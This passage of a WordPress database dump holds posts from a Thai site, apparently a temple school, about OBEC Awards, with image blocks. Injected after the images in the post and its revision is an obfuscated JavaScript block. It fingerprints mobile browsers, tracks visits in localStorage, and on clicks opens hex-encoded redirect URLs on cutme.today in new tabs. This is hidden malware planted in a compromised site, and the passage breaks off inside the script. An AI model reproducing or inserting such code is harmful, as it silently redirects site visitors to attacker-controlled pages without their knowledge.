_0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รางวัลทรงคุณค่า OBEC AWARDS การประกวดรางวัลทรงคุณค่า สพฐ.(OBEC AWADS) ระดับภาคตะวันออกเฉียงเหนือ ครั้งที่ 12 ประจำปีการศึกษา 2565-2566 รางวัลทรงคุณค่า OBEC AWARDS','','publish','open','open','','%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%a7%e0%b8%b1%e0%b8%a5%e0%b8%97%e0%b8%a3%e0%b8%87%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%84%e0%b9%88%e0%b8%b2-obec-awards-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3-2','','','2024-09-25 14:33:10','2024-09-25 07:33:10','',0,'http://watprato.ssk.in.th/?p=453',0,'post','',0),
(454,2,'2024-09-25 14:32:16','2024-09-25 07:32:16','','S__95092754','','inherit','open','closed','','s__95092754','','','2024-09-25 14:32:16','2024-09-25 07:32:16','',453,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/S__95092754.jpg',0,'attachment','image/jpeg',0),
(455,2,'2024-09-25 14:33:08','2024-09-25 07:33:08','<!-- wp:generateblocks/image {\"uniqueId\":\"445cc48c\",\"mediaId\":454,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-445cc48c\"><img class=\"gb-image gb-image-445cc48c\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/S__95092754.jpg\" alt=\"\" title=\"S__95092754\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รางวัลทรงคุณค่า OBEC AWARDS การประกวดรางวัลทรงคุณค่า สพฐ.(OBEC AWADS) ระดับภาคตะวันออกเฉียงเหนือ ครั้งที่ 12 ประจำปีการศึกษา 2565-2566 รางวัลทรงคุณค่า OBEC AWARDS','','inherit','closed','closed','','453-revision-v1','','','2024-09-25 14:33:08','2024-09-25 07:33:08','',453,'http://watprato.ssk.in.th/?p=455',0,'revision','',0),
(457,2,'2024-10-01 13:58:26','2024-10-01 06:58:26','<!-- wp:image {\"id\":458,\"sizeSlug\":\"full\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/10/461415627_122180698514202781_2938126010588144011_n.jpg\" alt=\"\" class=\"wp-image-458\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":460,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/10/461491731_122180699546202781_1978514125640280905_n-1024x726.jpg\" alt=\"\" class=\"wp-image-460\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":461,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/10/461296346_122180699444202781_3345559820320118519_n-1024x726.jpg\" alt=\"\" class=\"wp-image-461\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 